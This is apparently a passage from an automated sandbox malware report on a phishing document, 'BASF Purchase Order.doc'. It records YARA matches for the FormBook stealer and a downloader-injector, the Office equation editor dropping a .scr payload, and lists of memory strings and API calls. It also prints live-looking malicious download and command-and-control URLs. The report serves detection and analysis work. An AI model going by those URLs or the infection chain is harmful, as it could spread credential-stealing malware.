Source: dfrgui.exe, 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmp, sqlite3.dll.8.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: dfrgui.exe, 00000008.00000003.470221291.0000000006300000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: dfrgui.exe, 00000008.00000003.470221291.0000000006300000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: dfrgui.exe, 00000008.00000003.470221291.0000000006300000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: dfrgui.exe, 00000008.00000003.470221291.0000000006300000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: dfrgui.exe, 00000008.00000003.470221291.0000000006300000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: EQNEDT32.EXE, 00000002.00000002.359706346.000000000057C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dukeenergyltd.top/
Source: EQNEDT32.EXE, 00000002.00000002.359706346.000000000057C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dukeenergyltd.top/s
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.359706346.000000000054F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dukeenergyltd.top/sharon.scr
Source: EQNEDT32.EXE, 00000002.00000002.359706346.000000000054F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dukeenergyltd.top/sharon.scrj
Source: EQNEDT32.EXE, 00000002.00000002.359706346.000000000054F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dukeenergyltd.top/sharon.scrkkC:
Source: dfrgui.exe, 00000008.00000002.878728836.0000000003944000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.0000000003EE4000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: dfrgui.exe, 00000008.00000003.470221291.0000000006300000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: dfrgui.exe, 00000008.00000003.470221291.0000000006300000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EQNEDT32.EXE, 00000002.00000002.359706346.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
Source: dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
Source: dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
Source: dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
Source: dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
Source: dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.879155928.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
Source: dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
Source: dfrgui.exe, 00000008.00000003.470423056.0000000006322000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 13d6pS3.8.dr	String found in binary or memory: https://www.google.com/favicon.ico
Source: dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
Source: dfrgui.exe, 00000008.00000002.878728836.0000000003AD6000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.0000000004076000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.ibistradingco.com/ufuh/?ZXdp=hcZX01VSmexgOFZwe0PcJnDn64JizU3MIAbqwzBBfnOXJDQ4bl307S3dnZe
Source: dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.879155928.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
Source: dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
Source: dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.879155928.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
Source: dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.879155928.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.879155928.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
Source: dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.879155928.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.879155928.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: dfrgui.exe, 00000008.00000002.878728836.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.879155928.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878681184.000000000389C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb

Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49161 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 6.2.sharon48399.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.sharon48399.scr.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.878242341.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.405827300.0000000000320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.481797908.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.878328572.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.878421508.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.878315434.00000000002F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.406051877.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.878564779.0000000002860000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: BASF Purchase Order.doc, type: SAMPLE	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 6.2.sharon48399.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.sharon48399.scr.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.sharon48399.scr.a80000.1.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 5.2.sharon48399.scr.328a370.5.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 5.2.sharon48399.scr.2267b24.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 5.2.sharon48399.scr.a80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 5.2.sharon48399.scr.226a364.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 5.2.sharon48399.scr.328a370.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 00000008.00000002.878242341.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.405827300.0000000000320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.481797908.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.878328572.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.878421508.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.878315434.00000000002F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.362337538.0000000000A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects downloader injector Author: ditekSHen
Source: 00000006.00000002.406051877.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.878564779.0000000002860000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharon[1].scr			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\sharon48399.scr			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_0040B0C3 NtCreateSection,	6_2_0040B0C3
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_0040B2E3 NtMapViewOfSection,	6_2_0040B2E3
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_0040AA93 NtSetContextThread,	6_2_0040AA93
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_0040BBB3 NtDelayExecution,	6_2_0040BBB3
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_0040ACA3 NtResumeThread,	6_2_0040ACA3
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_0040B513 NtCreateFile,	6_2_0040B513
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_0040A673 NtSuspendThread,	6_2_0040A673
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_0042BF43 NtClose,	6_2_0042BF43
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_0040B743 NtReadFile,	6_2_0040B743
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_0040BFD3 NtAllocateVirtualMemory,	6_2_0040BFD3
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C107AC NtCreateMutant,LdrInitializeThunk,	6_2_00C107AC
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0F9F0 NtClose,LdrInitializeThunk,	6_2_00C0F9F0
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0FAE8 NtQueryInformationProcess,LdrInitializeThunk,	6_2_00C0FAE8
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0FB68 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_00C0FB68
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0FDC0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_00C0FDC0
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C100C4 NtCreateFile,	6_2_00C100C4
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C10048 NtProtectVirtualMemory,	6_2_00C10048
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C10060 NtQuerySection,	6_2_00C10060
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C10078 NtResumeThread,	6_2_00C10078
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C101D4 NtSetValueKey,	6_2_00C101D4
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C1010C NtOpenDirectoryObject,	6_2_00C1010C
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C10C40 NtGetContextThread,	6_2_00C10C40
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C110D0 NtOpenProcessToken,	6_2_00C110D0
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C11148 NtOpenThread,	6_2_00C11148
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0F8CC NtWaitForSingleObject,	6_2_00C0F8CC
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0F900 NtReadFile,	6_2_00C0F900
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C11930 NtSetContextThread,	6_2_00C11930
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0F938 NtWriteFile,	6_2_00C0F938
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0FAD0 NtAllocateVirtualMemory,	6_2_00C0FAD0
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0FAB8 NtQueryValueKey,	6_2_00C0FAB8
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0FA50 NtEnumerateValueKey,	6_2_00C0FA50
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0FA20 NtQueryInformationFile,	6_2_00C0FA20
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0FBE8 NtQueryVirtualMemory,	6_2_00C0FBE8
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0FBB8 NtQueryInformationToken,	6_2_00C0FBB8
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0FB50 NtCreateKey,	6_2_00C0FB50
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0FC90 NtUnmapViewOfSection,	6_2_00C0FC90
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0FC48 NtSetInformationFile,	6_2_00C0FC48
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0FC60 NtMapViewOfSection,	6_2_00C0FC60
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0FC30 NtOpenProcess,	6_2_00C0FC30
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C11D80 NtSuspendThread,	6_2_00C11D80
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0FD8C NtDelayExecution,	6_2_00C0FD8C
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0FD5C NtEnumerateKey,	6_2_00C0FD5C
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0FED0 NtAdjustPrivilegesToken,	6_2_00C0FED0
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0FEA0 NtReadVirtualMemory,	6_2_00C0FEA0
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0FE24 NtWriteVirtualMemory,	6_2_00C0FE24
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0FFFC NtCreateProcessEx,	6_2_00C0FFFC
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0FFB4 NtCreateSection,	6_2_00C0FFB4
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C0FF34 NtQueueApcThread,	6_2_00C0FF34

Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 5_2_001D407F	5_2_001D407F
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00402884	6_2_00402884
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00402890	6_2_00402890
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_0042E2F3	6_2_0042E2F3
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_004012B0	6_2_004012B0
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_004033D0	6_2_004033D0
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00417BEE	6_2_00417BEE
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00417BF3	6_2_00417BF3
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00411443	6_2_00411443
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_0041143A	6_2_0041143A
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_004034D0	6_2_004034D0
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_004025C0	6_2_004025C0
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_004025F9	6_2_004025F9
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00401580	6_2_00401580
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_004025B3	6_2_004025B3
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00411663	6_2_00411663
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00402ED0	6_2_00402ED0
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_0040F6E3	6_2_0040F6E3
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00402709	6_2_00402709
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C1E0C6	6_2_00C1E0C6
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C1E2E9	6_2_00C1E2E9
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C463DB	6_2_00C463DB
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CC63BF	6_2_00CC63BF
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C6A37B	6_2_00C6A37B
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C22305	6_2_00C22305
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CA443E	6_2_00CA443E
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CA05E3	6_2_00CA05E3
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C3C5F0	6_2_00C3C5F0
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C66540	6_2_00C66540
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C2E6C1	6_2_00C2E6C1
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C24680	6_2_00C24680
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CC2622	6_2_00CC2622
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C6A634	6_2_00C6A634
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C2C7BC	6_2_00C2C7BC
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C2C85C	6_2_00C2C85C
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C4286D	6_2_00C4286D
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C369FE	6_2_00C369FE
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CB49F5	6_2_00CB49F5
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CC098E	6_2_00CC098E
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C229B2	6_2_00C229B2
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C6C920	6_2_00C6C920
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CA6BCB	6_2_00CA6BCB
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CCCBA4	6_2_00CCCBA4
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CC2C9C	6_2_00CC2C9C
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CAAC5E	6_2_00CAAC5E
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C2CD5B	6_2_00C2CD5B
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C50D3B	6_2_00C50D3B
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C3EE4C	6_2_00C3EE4C
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C52E2F	6_2_00C52E2F
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C92FDC	6_2_00C92FDC
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CBCFB1	6_2_00CBCFB1
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C30F3F	6_2_00C30F3F
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C23040	6_2_00C23040
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C3905A	6_2_00C3905A
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C9D06D	6_2_00C9D06D
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C4D005	6_2_00C4D005
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CAD13F	6_2_00CAD13F
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CC1238	6_2_00CC1238
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C1F3CF	6_2_00C1F3CF
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C27353	6_2_00C27353
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C55485	6_2_00C55485
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C31489	6_2_00C31489
